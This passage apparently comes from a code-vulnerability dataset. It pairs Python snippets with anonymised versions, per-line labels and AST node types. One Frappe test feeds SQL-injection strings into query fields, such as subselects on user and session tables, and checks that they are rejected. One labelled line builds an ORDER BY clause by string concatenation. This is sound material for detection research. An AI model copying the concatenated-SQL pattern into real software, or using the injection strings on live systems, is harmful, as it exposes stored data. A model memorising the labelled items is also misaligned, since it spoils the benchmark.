"self.assertTrue({'name': event4.name} not in data)\n",
"data = DatabaseQuery('Event').execute(filters={'starts_on': ['between', [\n '2016-07-07']]}, fields=['name'])\n",
"self.assertTrue({'name': event3.name} in data)\n",
"self.assertTrue({'name': event4.name} in data)\n",
"self.assertTrue({'name': todays_event.name} in data)\n",
"self.assertTrue({'name': event1.name} not in data)\n",
"self.assertTrue({'name': event2.name} not in data)\n",
"def test_ignore_permissions_for_get_filters_cond(self):...\n",
"frappe.set_user('[email protected]')\n",
"self.assertRaises(frappe.PermissionError, get_filters_cond, 'DocType', dict\n (istable=1), [])\n",
"self.assertTrue(get_filters_cond('DocType', dict(istable=1), [],\n ignore_permissions=True))\n",
"frappe.set_user('Administrator')\n",
"def test_query_fields_sanitizer(self):...\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name', 'issingle, version()'], limit_start=0, limit_page_length=1)\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name',\n 'issingle, IF(issingle=1, (select name from tabUser), count(name))'],\n limit_start=0, limit_page_length=1)\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name', 'issingle, (select count(*) from tabSessions)'],\n limit_start=0, limit_page_length=1)\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name',\n \"issingle, SELECT LOCATE('', `tabUser`.`user`) AS user;\"], limit_start=\n 0, limit_page_length=1)\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name',\n 'issingle, IF(issingle=1, (SELECT name from tabUser), count(*))'],\n limit_start=0, limit_page_length=1)\n",
"data = DatabaseQuery('DocType').execute(fields=['name', 'issingle',\n 'count(name)'], limit_start=0, limit_page_length=1)\n",
"self.assertTrue('count(name)' in data[0])\n",
"data = DatabaseQuery('DocType').execute(fields=['name', 'issingle',\n \"locate('', name) as _relevance\"], limit_start=0, limit_page_length=1)\n",
"self.assertTrue('_relevance' in data[0])\n",
"data = DatabaseQuery('DocType').execute(fields=['name', 'issingle',\n 'date(creation) as creation'], limit_start=0, limit_page_length=1)\n",
"self.assertTrue('creation' in data[0])\n",
"data = DatabaseQuery('DocType').execute(fields=['name', 'issingle',\n 'datediff(modified, creation) as date_diff'], limit_start=0,\n limit_page_length=1)\n",
"self.assertTrue('date_diff' in data[0])\n",
"def create_event(subject='_Test Event', starts_on=None):...\n",
"\"\"\"docstring\"\"\"\n",
"from frappe.utils import get_datetime\n",
"event = frappe.get_doc({'doctype': 'Event', 'subject': subject,\n 'event_type': 'Public', 'starts_on': get_datetime(starts_on)}).insert(\n ignore_permissions=True)\n",
"return event\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
4
] | [
"ImportFrom'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"Expr'",
"For",
"Expr'",
"For",
"Expr'",
"FunctionDef'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"FunctionDef'",
"Docstring",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"FunctionDef'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"FunctionDef'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Assign'",
"Expr'",
"Assign'",
"Expr'",
"Assign'",
"Expr'",
"FunctionDef'",
"Docstring",
"ImportFrom'",
"Assign'",
"Return'"
] |
[
"def FUNC_13(self, VAR_9, VAR_10=None, VAR_11=None, VAR_17='', VAR_18='',...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_28 = self.get_and_check_task(VAR_9, VAR_10, VAR_11)\n",
"VAR_29 = VAR_28.get_tile_path(VAR_17, VAR_18, VAR_19)\n",
"if os.path.isfile(VAR_29):\n",
"VAR_32 = open(VAR_29, 'rb')\n",
"return HttpResponse(FileWrapper(VAR_32), content_type='image/png')\n"
] | [
"def get(self, request, pk=None, project_pk=None, z='', x='', y=''):...\n",
"\"\"\"docstring\"\"\"\n",
"task = self.get_and_check_task(request, pk, project_pk)\n",
"tile_path = task.get_tile_path(z, x, y)\n",
"if os.path.isfile(tile_path):\n",
"tile = open(tile_path, 'rb')\n",
"return HttpResponse(FileWrapper(tile), content_type='image/png')\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"Condition",
"Docstring",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Return'"
] |
[
"def FUNC_8(self, VAR_17, VAR_18, VAR_19):...\n",
"\"\"\"docstring\"\"\"\n",
"if not VAR_17:\n",
"return self.CreateError('Step name must be specified', 400)\n",
"if not VAR_18:\n",
"return self.CreateError('Test name must be specified', 400)\n",
"if VAR_19 and not VAR_19.isdigit():\n",
"return self.CreateError('Bug id must be an int', 400)\n",
"return None\n"
] | [
"def _ValidateInput(self, step_name, test_name, bug_id):...\n",
"\"\"\"docstring\"\"\"\n",
"if not step_name:\n",
"return self.CreateError('Step name must be specified', 400)\n",
"if not test_name:\n",
"return self.CreateError('Test name must be specified', 400)\n",
"if bug_id and not bug_id.isdigit():\n",
"return self.CreateError('Bug id must be an int', 400)\n",
"return None\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Condition",
"Return'",
"Condition",
"Return'",
"Condition",
"Return'",
"Return'"
] |
[
"from django.db import models, migrations\n",
"from django.utils import timezone\n",
"import datetime\n",
"import exercise.submission_models\n",
"import lib.helpers\n",
"import exercise.exercise_models\n",
"import lib.fields\n",
"VAR_0 = [('inheritance', '0001_initial'), ('userprofile', '0001_initial'),\n ('course', '0001_initial')]\n",
"VAR_1 = [migrations.CreateModel(name='CourseModule', fields=[('id', models.\n AutoField(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)), ('name', models.CharField(max_length=255)), (\n 'points_to_pass', models.PositiveIntegerField(default=0)), (\n 'introduction', models.TextField(blank=True)), ('opening_time', models.\n DateTimeField(default=timezone.now)), ('closing_time', models.\n DateTimeField(default=timezone.now)), ('late_submissions_allowed',\n models.BooleanField(default=False)), ('late_submission_deadline',\n models.DateTimeField(default=timezone.now)), ('late_submission_penalty',\n lib.fields.PercentField(default=0.5, help_text=\n 'Multiplier of points to reduce, as decimal. 0.1 = 10%')), (\n 'course_instance', models.ForeignKey(related_name='course_modules', to=\n 'course.CourseInstance'))], options={'ordering': ['closing_time', 'id']\n }, bases=(models.Model,)), migrations.CreateModel(name=\n 'DeadlineRuleDeviation', fields=[('id', models.AutoField(verbose_name=\n 'ID', serialize=False, auto_created=True, primary_key=True)), (\n 'extra_minutes', models.IntegerField())], options={'abstract': False},\n bases=(models.Model,)), migrations.CreateModel(name='LearningObject',\n fields=[('modelwithinheritance_ptr', models.OneToOneField(parent_link=\n True, auto_created=True, primary_key=True, serialize=False, to=\n 'inheritance.ModelWithInheritance')), ('order', models.IntegerField(\n default=0)), ('name', models.CharField(max_length=255)), ('description',\n models.TextField(blank=True)), ('instructions', models.TextField(blank=\n True)), ('service_url', models.URLField(blank=True))], options={},\n bases=('inheritance.modelwithinheritance',)), migrations.CreateModel(\n name='BaseExercise', fields=[('learningobject_ptr', models.\n OneToOneField(parent_link=True, auto_created=True, primary_key=True,\n serialize=False, to='exercise.LearningObject')), (\n 'allow_assistant_grading', models.BooleanField(default=False)), (\n 'min_group_size', models.PositiveIntegerField(default=1)), (\n 'max_group_size', models.PositiveIntegerField(default=1)), (\n 'max_submissions', models.PositiveIntegerField(default=10)), (\n 'max_points', models.PositiveIntegerField(default=100)), (\n 'points_to_pass', models.PositiveIntegerField(default=40))], options={\n 'ordering': ['course_module__closing_time', 'course_module', 'order',\n 'id']}, bases=('exercise.learningobject',)), migrations.CreateModel(\n name='ExerciseWithAttachment', fields=[('baseexercise_ptr', models.\n OneToOneField(parent_link=True, auto_created=True, primary_key=True,\n serialize=False, to='exercise.BaseExercise')), ('files_to_submit',\n models.CharField(help_text=\n 'File names that user should submit, use pipe character to separate files',\n max_length=200, blank=True)), ('attachment', models.FileField(upload_to\n =exercise.exercise_models.build_upload_dir))], options={\n 'verbose_name_plural': 'exercises with attachment'}, bases=(\n 'exercise.baseexercise',)), migrations.CreateModel(name=\n 'AsynchronousExercise', fields=[('baseexercise_ptr', models.\n OneToOneField(parent_link=True, auto_created=True, primary_key=True,\n serialize=False, to='exercise.BaseExercise'))], options={}, bases=(\n 'exercise.baseexercise',)), migrations.CreateModel(name=\n 'LearningObjectCategory', fields=[('id', models.AutoField(verbose_name=\n 'ID', serialize=False, auto_created=True, primary_key=True)), ('name',\n models.CharField(max_length=35)), ('description', models.TextField(\n blank=True)), ('points_to_pass', 
models.PositiveIntegerField(default=0)\n ), ('course_instance', models.ForeignKey(related_name='categories', to=\n 'course.CourseInstance')), ('hidden_to', models.ManyToManyField(\n related_name='hidden_categories', null=True, to=\n 'userprofile.UserProfile', blank=True))], options={}, bases=(models.\n Model,)), migrations.CreateModel(name='MaxSubmissionsRuleDeviation',\n fields=[('id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('extra_submissions', models.\n IntegerField())], options={'abstract': False}, bases=(models.Model,)),\n migrations.CreateModel(name='StaticExercise', fields=[(\n 'baseexercise_ptr', models.OneToOneField(parent_link=True, auto_created\n =True, primary_key=True, serialize=False, to='exercise.BaseExercise')),\n ('exercise_page_content', models.TextField()), (\n 'submission_page_content', models.TextField())], options={}, bases=(\n 'exercise.baseexercise',)), migrations.CreateModel(name='Submission',\n fields=[('id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('submission_time', models.\n DateTimeField(auto_now_add=True)), ('hash', models.CharField(default=\n lib.helpers.get_random_string, max_length=32)), ('feedback', models.\n TextField(blank=True)), ('assistant_feedback', models.TextField(blank=\n True)), ('status', models.CharField(default=b'initialized', max_length=\n 32, choices=[(b'initialized', 'Initialized'), (b'waiting', 'Waiting'),\n (b'ready', 'Ready'), (b'error', 'Error')])), ('grade', models.\n IntegerField(default=0)), ('grading_time', models.DateTimeField(null=\n True, blank=True)), ('service_points', models.IntegerField(default=0)),\n ('service_max_points', models.IntegerField(default=0)), (\n 'submission_data', lib.fields.JSONField(blank=True)), ('grading_data',\n lib.fields.JSONField(blank=True))], options={'ordering': [\n '-submission_time']}, bases=(models.Model,)), migrations.CreateModel(\n name='SubmittedFile', fields=[('id', models.AutoField(verbose_name='ID',\n serialize=False, auto_created=True, primary_key=True)), ('param_name',\n models.CharField(max_length=128)), ('file_object', models.FileField(\n max_length=255, upload_to=exercise.submission_models.build_upload_dir)),\n ('submission', models.ForeignKey(related_name='files', to=\n 'exercise.Submission'))], options={}, bases=(models.Model,)),\n migrations.CreateModel(name='SynchronousExercise', fields=[(\n 'baseexercise_ptr', models.OneToOneField(parent_link=True, auto_created\n =True, primary_key=True, serialize=False, to='exercise.BaseExercise'))],\n options={}, bases=('exercise.baseexercise',)), migrations.AddField(\n model_name='submission', name='exercise', field=models.ForeignKey(\n related_name='submissions', to='exercise.BaseExercise'),\n preserve_default=True), migrations.AddField(model_name='submission',\n name='grader', field=models.ForeignKey(related_name=\n 'graded_submissions', blank=True, to='userprofile.UserProfile', null=\n True), preserve_default=True), migrations.AddField(model_name=\n 'submission', name='submitters', field=models.ManyToManyField(\n related_name='submissions', to='userprofile.UserProfile'),\n preserve_default=True), migrations.AddField(model_name=\n 'maxsubmissionsruledeviation', name='exercise', field=models.ForeignKey\n (related_name='maxsubmissionsruledeviations', to=\n 'exercise.BaseExercise'), preserve_default=True), migrations.AddField(\n model_name='maxsubmissionsruledeviation', name='submitter', field=\n 
models.ForeignKey(to='userprofile.UserProfile'), preserve_default=True),\n migrations.AlterUniqueTogether(name='maxsubmissionsruledeviation',\n unique_together=set([('exercise', 'submitter')])), migrations.\n AlterUniqueTogether(name='learningobjectcategory', unique_together=set(\n [('name', 'course_instance')])), migrations.AddField(model_name=\n 'learningobject', name='category', field=models.ForeignKey(related_name\n ='learning_objects', to='exercise.LearningObjectCategory'),\n preserve_default=True), migrations.AddField(model_name='learningobject',\n name='course_module', field=models.ForeignKey(related_name=\n 'learning_objects', to='exercise.CourseModule'), preserve_default=True),\n migrations.AddField(model_name='deadlineruledeviation', name='exercise',\n field=models.ForeignKey(related_name='deadlineruledeviations', to=\n 'exercise.BaseExercise'), preserve_default=True), migrations.AddField(\n model_name='deadlineruledeviation', name='submitter', field=models.\n ForeignKey(to='userprofile.UserProfile'), preserve_default=True),\n migrations.AlterUniqueTogether(name='deadlineruledeviation',\n unique_together=set([('exercise', 'submitter')]))]\n"
] | [
"from django.db import models, migrations\n",
"from django.utils import timezone\n",
"import datetime\n",
"import exercise.submission_models\n",
"import lib.helpers\n",
"import exercise.exercise_models\n",
"import lib.fields\n",
"dependencies = [('inheritance', '0001_initial'), ('userprofile',\n '0001_initial'), ('course', '0001_initial')]\n",
"operations = [migrations.CreateModel(name='CourseModule', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)), ('name', models.CharField(max_length=255)), (\n 'points_to_pass', models.PositiveIntegerField(default=0)), (\n 'introduction', models.TextField(blank=True)), ('opening_time', models.\n DateTimeField(default=timezone.now)), ('closing_time', models.\n DateTimeField(default=timezone.now)), ('late_submissions_allowed',\n models.BooleanField(default=False)), ('late_submission_deadline',\n models.DateTimeField(default=timezone.now)), ('late_submission_penalty',\n lib.fields.PercentField(default=0.5, help_text=\n 'Multiplier of points to reduce, as decimal. 0.1 = 10%')), (\n 'course_instance', models.ForeignKey(related_name='course_modules', to=\n 'course.CourseInstance'))], options={'ordering': ['closing_time', 'id']\n }, bases=(models.Model,)), migrations.CreateModel(name=\n 'DeadlineRuleDeviation', fields=[('id', models.AutoField(verbose_name=\n 'ID', serialize=False, auto_created=True, primary_key=True)), (\n 'extra_minutes', models.IntegerField())], options={'abstract': False},\n bases=(models.Model,)), migrations.CreateModel(name='LearningObject',\n fields=[('modelwithinheritance_ptr', models.OneToOneField(parent_link=\n True, auto_created=True, primary_key=True, serialize=False, to=\n 'inheritance.ModelWithInheritance')), ('order', models.IntegerField(\n default=0)), ('name', models.CharField(max_length=255)), ('description',\n models.TextField(blank=True)), ('instructions', models.TextField(blank=\n True)), ('service_url', models.URLField(blank=True))], options={},\n bases=('inheritance.modelwithinheritance',)), migrations.CreateModel(\n name='BaseExercise', fields=[('learningobject_ptr', models.\n OneToOneField(parent_link=True, auto_created=True, primary_key=True,\n serialize=False, to='exercise.LearningObject')), (\n 'allow_assistant_grading', models.BooleanField(default=False)), (\n 'min_group_size', models.PositiveIntegerField(default=1)), (\n 'max_group_size', models.PositiveIntegerField(default=1)), (\n 'max_submissions', models.PositiveIntegerField(default=10)), (\n 'max_points', models.PositiveIntegerField(default=100)), (\n 'points_to_pass', models.PositiveIntegerField(default=40))], options={\n 'ordering': ['course_module__closing_time', 'course_module', 'order',\n 'id']}, bases=('exercise.learningobject',)), migrations.CreateModel(\n name='ExerciseWithAttachment', fields=[('baseexercise_ptr', models.\n OneToOneField(parent_link=True, auto_created=True, primary_key=True,\n serialize=False, to='exercise.BaseExercise')), ('files_to_submit',\n models.CharField(help_text=\n 'File names that user should submit, use pipe character to separate files',\n max_length=200, blank=True)), ('attachment', models.FileField(upload_to\n =exercise.exercise_models.build_upload_dir))], options={\n 'verbose_name_plural': 'exercises with attachment'}, bases=(\n 'exercise.baseexercise',)), migrations.CreateModel(name=\n 'AsynchronousExercise', fields=[('baseexercise_ptr', models.\n OneToOneField(parent_link=True, auto_created=True, primary_key=True,\n serialize=False, to='exercise.BaseExercise'))], options={}, bases=(\n 'exercise.baseexercise',)), migrations.CreateModel(name=\n 'LearningObjectCategory', fields=[('id', models.AutoField(verbose_name=\n 'ID', serialize=False, auto_created=True, primary_key=True)), ('name',\n models.CharField(max_length=35)), ('description', models.TextField(\n blank=True)), ('points_to_pass', 
models.PositiveIntegerField(default=0)\n ), ('course_instance', models.ForeignKey(related_name='categories', to=\n 'course.CourseInstance')), ('hidden_to', models.ManyToManyField(\n related_name='hidden_categories', null=True, to=\n 'userprofile.UserProfile', blank=True))], options={}, bases=(models.\n Model,)), migrations.CreateModel(name='MaxSubmissionsRuleDeviation',\n fields=[('id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('extra_submissions', models.\n IntegerField())], options={'abstract': False}, bases=(models.Model,)),\n migrations.CreateModel(name='StaticExercise', fields=[(\n 'baseexercise_ptr', models.OneToOneField(parent_link=True, auto_created\n =True, primary_key=True, serialize=False, to='exercise.BaseExercise')),\n ('exercise_page_content', models.TextField()), (\n 'submission_page_content', models.TextField())], options={}, bases=(\n 'exercise.baseexercise',)), migrations.CreateModel(name='Submission',\n fields=[('id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('submission_time', models.\n DateTimeField(auto_now_add=True)), ('hash', models.CharField(default=\n lib.helpers.get_random_string, max_length=32)), ('feedback', models.\n TextField(blank=True)), ('assistant_feedback', models.TextField(blank=\n True)), ('status', models.CharField(default=b'initialized', max_length=\n 32, choices=[(b'initialized', 'Initialized'), (b'waiting', 'Waiting'),\n (b'ready', 'Ready'), (b'error', 'Error')])), ('grade', models.\n IntegerField(default=0)), ('grading_time', models.DateTimeField(null=\n True, blank=True)), ('service_points', models.IntegerField(default=0)),\n ('service_max_points', models.IntegerField(default=0)), (\n 'submission_data', lib.fields.JSONField(blank=True)), ('grading_data',\n lib.fields.JSONField(blank=True))], options={'ordering': [\n '-submission_time']}, bases=(models.Model,)), migrations.CreateModel(\n name='SubmittedFile', fields=[('id', models.AutoField(verbose_name='ID',\n serialize=False, auto_created=True, primary_key=True)), ('param_name',\n models.CharField(max_length=128)), ('file_object', models.FileField(\n max_length=255, upload_to=exercise.submission_models.build_upload_dir)),\n ('submission', models.ForeignKey(related_name='files', to=\n 'exercise.Submission'))], options={}, bases=(models.Model,)),\n migrations.CreateModel(name='SynchronousExercise', fields=[(\n 'baseexercise_ptr', models.OneToOneField(parent_link=True, auto_created\n =True, primary_key=True, serialize=False, to='exercise.BaseExercise'))],\n options={}, bases=('exercise.baseexercise',)), migrations.AddField(\n model_name='submission', name='exercise', field=models.ForeignKey(\n related_name='submissions', to='exercise.BaseExercise'),\n preserve_default=True), migrations.AddField(model_name='submission',\n name='grader', field=models.ForeignKey(related_name=\n 'graded_submissions', blank=True, to='userprofile.UserProfile', null=\n True), preserve_default=True), migrations.AddField(model_name=\n 'submission', name='submitters', field=models.ManyToManyField(\n related_name='submissions', to='userprofile.UserProfile'),\n preserve_default=True), migrations.AddField(model_name=\n 'maxsubmissionsruledeviation', name='exercise', field=models.ForeignKey\n (related_name='maxsubmissionsruledeviations', to=\n 'exercise.BaseExercise'), preserve_default=True), migrations.AddField(\n model_name='maxsubmissionsruledeviation', name='submitter', field=\n 
models.ForeignKey(to='userprofile.UserProfile'), preserve_default=True),\n migrations.AlterUniqueTogether(name='maxsubmissionsruledeviation',\n unique_together=set([('exercise', 'submitter')])), migrations.\n AlterUniqueTogether(name='learningobjectcategory', unique_together=set(\n [('name', 'course_instance')])), migrations.AddField(model_name=\n 'learningobject', name='category', field=models.ForeignKey(related_name\n ='learning_objects', to='exercise.LearningObjectCategory'),\n preserve_default=True), migrations.AddField(model_name='learningobject',\n name='course_module', field=models.ForeignKey(related_name=\n 'learning_objects', to='exercise.CourseModule'), preserve_default=True),\n migrations.AddField(model_name='deadlineruledeviation', name='exercise',\n field=models.ForeignKey(related_name='deadlineruledeviations', to=\n 'exercise.BaseExercise'), preserve_default=True), migrations.AddField(\n model_name='deadlineruledeviation', name='submitter', field=models.\n ForeignKey(to='userprofile.UserProfile'), preserve_default=True),\n migrations.AlterUniqueTogether(name='deadlineruledeviation',\n unique_together=set([('exercise', 'submitter')]))]\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
4
] | [
"ImportFrom'",
"ImportFrom'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Assign'",
"Assign'"
] |
[
"from django.core.exceptions import PermissionDenied\n",
"from django.template.response import SimpleTemplateResponse\n",
"from lib.viewbase import BaseMixin, BaseTemplateView\n",
"from authorization.permissions import ACCESS\n",
"from .models import UserProfile\n",
"VAR_0 = ACCESS.STUDENT\n",
"VAR_1 = True\n",
"def FUNC_0(self):...\n",
"super().get_resource_objects()\n",
"VAR_2 = self.request.user\n",
"if VAR_2.is_authenticated():\n",
"self.profile = VAR_3 = VAR_2.userprofile\n",
"self.profile = None\n",
"self.is_external_student = VAR_3.is_external\n",
"self.is_external_student = False\n",
"self.note('profile', 'is_external_student')\n"
] | [
"from django.core.exceptions import PermissionDenied\n",
"from django.template.response import SimpleTemplateResponse\n",
"from lib.viewbase import BaseMixin, BaseTemplateView\n",
"from authorization.permissions import ACCESS\n",
"from .models import UserProfile\n",
"access_mode = ACCESS.STUDENT\n",
"login_redirect = True\n",
"def get_resource_objects(self):...\n",
"super().get_resource_objects()\n",
"user = self.request.user\n",
"if user.is_authenticated():\n",
"self.profile = profile = user.userprofile\n",
"self.profile = None\n",
"self.is_external_student = profile.is_external\n",
"self.is_external_student = False\n",
"self.note('profile', 'is_external_student')\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
4,
0,
0,
0,
0,
0
] | [
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"Assign'",
"Assign'",
"FunctionDef'",
"Expr'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'"
] |
[
"def FUNC_6(self):...\n",
"if self._owned:\n",
"if self._listenerthread != threading.current_thread():\n",
"self._conn.close()\n",
"self._listenerthread.join(VAR_6=1.0)\n",
"self._check_handlers()\n",
"if self._listenerthread.is_alive():\n",
"warnings.warn('session listener still running')\n"
] | [
"def _close(self):...\n",
"if self._owned:\n",
"if self._listenerthread != threading.current_thread():\n",
"self._conn.close()\n",
"self._listenerthread.join(timeout=1.0)\n",
"self._check_handlers()\n",
"if self._listenerthread.is_alive():\n",
"warnings.warn('session listener still running')\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"Condition",
"Expr'"
] |
[
"def FUNC_2(self, VAR_5=None, VAR_6=None, VAR_7='', VAR_8=''):...\n",
"if VAR_6:\n",
"VAR_5 = VAR_6.apply_all(VAR_5)\n",
"if VAR_7 != '':\n",
"if hasattr(self.obj, VAR_7):\n",
"return VAR_5\n",
"if hasattr(getattr(self.obj, VAR_7), '_col_name'):\n",
"VAR_5 = VAR_5.order_by(VAR_7 + ' ' + VAR_8)\n",
"VAR_7 = getattr(getattr(self.obj, VAR_7), '_col_name')\n"
] | [
"def _get_base_query(self, query=None, filters=None, order_column='',...\n",
"if filters:\n",
"query = filters.apply_all(query)\n",
"if order_column != '':\n",
"if hasattr(self.obj, order_column):\n",
"return query\n",
"if hasattr(getattr(self.obj, order_column), '_col_name'):\n",
"query = query.order_by(order_column + ' ' + order_direction)\n",
"order_column = getattr(getattr(self.obj, order_column), '_col_name')\n"
] | [
0,
0,
0,
0,
0,
0,
0,
4,
0
] | [
"FunctionDef'",
"Condition",
"Assign'",
"Condition",
"Condition",
"Return'",
"Condition",
"Assign'",
"Assign'"
] |
[
"def FUNC_11(self, VAR_13):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_26 = self.add_argument_group('ParlAI Image Preprocessing Arguments')\n",
"VAR_26.add_argument('--image-size', type=int, default=256, help=\n 'resizing dimension for images')\n",
"VAR_26.add_argument('--image-cropsize', type=int, default=224, help=\n 'crop dimension for images')\n"
] | [
"def add_image_args(self, image_mode):...\n",
"\"\"\"docstring\"\"\"\n",
"parlai = self.add_argument_group('ParlAI Image Preprocessing Arguments')\n",
"parlai.add_argument('--image-size', type=int, default=256, help=\n 'resizing dimension for images')\n",
"parlai.add_argument('--image-cropsize', type=int, default=224, help=\n 'crop dimension for images')\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Expr'",
"Expr'"
] |
[
"def FUNC_13(VAR_0):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_52, VAR_46 = FUNC_12(VAR_0)\n",
"if VAR_46:\n",
"return FUNC_6(VAR_46)\n",
"VAR_64 = TestCaseRun.objects.filter(pk__in=data['runs'])\n",
"VAR_65 = VAR_52['bug_system_id']\n",
"VAR_66 = VAR_52['bugs']\n",
"validate_bug_id(VAR_66, VAR_65)\n",
"return FUNC_6(VAR_94(e))\n",
"VAR_67 = VAR_52['bz_external_track']\n",
"VAR_68 = VAR_52['action']\n",
"if VAR_68 == 'add':\n",
"return FUNC_6(VAR_94(e))\n",
"return FUNC_7()\n",
"for FUNC_28 in VAR_64:\n",
"VAR_102 = Bug.objects.filter(bug_id__in=bug_ids)\n",
"for bug_id in VAR_66:\n",
"for FUNC_28 in VAR_64:\n",
"FUNC_28.add_bug(bug_id=bug_id, VAR_65=bug_system_id, VAR_67=bz_external_track)\n",
"for bug in VAR_102:\n",
"if bug.case_run_id == FUNC_28.pk:\n",
"FUNC_28.remove_bug(bug.bug_id, FUNC_28.pk)\n"
] | [
"def update_bugs_to_caseruns(request):...\n",
"\"\"\"docstring\"\"\"\n",
"data, error = clean_bug_form(request)\n",
"if error:\n",
"return say_no(error)\n",
"runs = TestCaseRun.objects.filter(pk__in=data['runs'])\n",
"bug_system_id = data['bug_system_id']\n",
"bug_ids = data['bugs']\n",
"validate_bug_id(bug_ids, bug_system_id)\n",
"return say_no(str(e))\n",
"bz_external_track = data['bz_external_track']\n",
"action = data['action']\n",
"if action == 'add':\n",
"return say_no(str(e))\n",
"return say_yes()\n",
"for run in runs:\n",
"bugs = Bug.objects.filter(bug_id__in=bug_ids)\n",
"for bug_id in bug_ids:\n",
"for run in runs:\n",
"run.add_bug(bug_id=bug_id, bug_system_id=bug_system_id, bz_external_track=\n bz_external_track)\n",
"for bug in bugs:\n",
"if bug.case_run_id == run.pk:\n",
"run.remove_bug(bug.bug_id, run.pk)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Condition",
"Return'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Return'",
"Assign'",
"Assign'",
"Condition",
"Return'",
"Return'",
"For",
"Assign'",
"For",
"For",
"Expr'",
"For",
"Condition",
"Expr'"
] |
[
"def FUNC_5(self, VAR_5):...\n",
"if VAR_5 in self.groups:\n",
"self.groups.remove(VAR_5)\n",
"for oldg in VAR_5.get_ancestors():\n",
"if oldg.name != 'all':\n",
"for childg in self.groups:\n",
"if oldg in childg.get_ancestors():\n"
] | [
"def remove_group(self, group):...\n",
"if group in self.groups:\n",
"self.groups.remove(group)\n",
"for oldg in group.get_ancestors():\n",
"if oldg.name != 'all':\n",
"for childg in self.groups:\n",
"if oldg in childg.get_ancestors():\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Expr'",
"For",
"Condition",
"For",
"Condition"
] |
[
"def FUNC_17(VAR_16):...\n",
"VAR_0.info('Login Error for %s' % VAR_5.args['username'][0])\n",
"VAR_0.info('%s' % VAR_16)\n",
"VAR_5.setResponseCode(UNAUTHORIZED)\n",
"return self._render_template(VAR_5, 'Invalid credentials')\n"
] | [
"def render_error(error):...\n",
"log.info('Login Error for %s' % request.args['username'][0])\n",
"log.info('%s' % error)\n",
"request.setResponseCode(UNAUTHORIZED)\n",
"return self._render_template(request, 'Invalid credentials')\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Expr'",
"Expr'",
"Expr'",
"Return'"
] |
[
"def FUNC_2(VAR_4, VAR_5, VAR_6, VAR_7=nsxlib_testcase.NSX_CERT, VAR_8=None,...\n",
"return FUNC_1(VAR_4, VAR_5, VAR_6, VAR_7=verify, VAR_8=data, VAR_9=headers,\n VAR_11=single_call)\n"
] | [
"def assert_json_call(verb, client_or_resource, url, verify=nsxlib_testcase....\n",
"return assert_call(verb, client_or_resource, url, verify=verify, data=data,\n headers=headers, single_call=single_call)\n"
] | [
0,
0
] | [
"Condition",
"Return'"
] |
[
"\"\"\"\nCreated on Mon Jan 1 21:38:13 2018\n\n@author: Adam\n\"\"\"\n",
"import codecs\n",
"import re\n",
"import time\n",
"import warnings\n",
"from serial import SerialException, Serial\n",
"from .tools import get_serial_settings\n",
"from .base import Device\n",
"\"\"\" communication with a serial device \"\"\"\n",
"def __init__(self, VAR_0, VAR_1=False):...\n",
"self.settings = VAR_0\n",
"self.serial_settings = get_serial_settings(VAR_0)\n",
"self.sensors = VAR_0.get('sensors', None)\n",
"self.cmd = codecs.decode(self.settings['cmd'], 'unicode-escape')\n",
"self.regex = VAR_0.get('regex', None)\n",
"self.debug = VAR_1\n",
"if self.debug:\n",
